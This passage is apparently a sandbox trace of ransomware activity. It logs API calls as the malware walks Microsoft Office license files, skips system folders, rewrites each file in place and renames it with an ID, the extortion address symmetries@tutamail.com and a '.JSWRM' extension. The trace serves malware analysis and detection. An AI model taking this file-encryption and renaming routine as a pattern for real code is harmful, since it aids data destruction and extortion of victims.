out: hHeap=0x1e0000) returned 1 [0104.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0104.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0104.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.618] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0104.618] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0104.618] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.621] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.621] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.625] CloseHandle (hObject=0x45c) returned 1 [0104.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0104.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0104.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0104.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0104.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0104.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0104.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0104.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0104.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0104.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.628] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5800a85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5800a85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5931e55, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x57c2, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365BusinessR_SubTrial-ppd.xrm-ms", cAlternateFileName="O3DA6A~1.XRM")) returned 1 [0104.629] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ppd.xrm-ms", lpString2=".") returned 1 [0104.629] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ppd.xrm-ms", lpString2="..") returned 1 [0104.629] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ppd.xrm-ms", lpString2="...") returned 1 [0104.629] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ppd.xrm-ms", lpString2="windows") returned -1 [0104.629] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.629] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.629] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.629] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.629] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.629] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0104.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0104.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0104.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.630] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22466) returned 1 [0104.630] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x57c0) returned 0x24c1d0 [0104.630] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x57c0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x57c0, lpOverlapped=0x0) returned 1 [0104.634] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.634] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x57c0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x57c0, lpOverlapped=0x0) returned 1 [0104.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.634] CloseHandle (hObject=0x45c) returned 1 [0104.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0104.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0104.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0104.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0104.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0104.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0104.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.634] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0104.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0104.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.635] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5afba39, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5afba39, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5bba5ac, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365BusinessR_SubTrial-ul-oob.xrm-ms", cAlternateFileName="O369C1~1.XRM")) returned 1 [0104.635] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.635] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.635] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.635] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.635] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.635] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.636] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.636] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.636] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.636] lstrcmpiW (lpString1="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0104.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0104.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0104.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0104.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.636] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11631) returned 1 [0104.637] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0104.637] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0104.639] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.639] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0104.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.639] CloseHandle (hObject=0x45c) returned 1 [0104.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0104.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0104.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0104.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0104.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0104.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0104.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.640] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0104.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0104.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0104.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.640] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe57da862, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe57da862, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe589944e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bd3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", cAlternateFileName="O363C4~1.XRM")) returned 1 [0104.640] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpString2=".") returned 1 [0104.640] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpString2="..") returned 1 [0104.640] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpString2="...") returned 1 [0104.641] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpString2="windows") returned -1 [0104.641] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpString2="recovery") returned -1 [0104.641] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.641] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.641] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.641] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.641] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpString2="msocache") returned 1 [0104.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0104.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0104.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d298, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 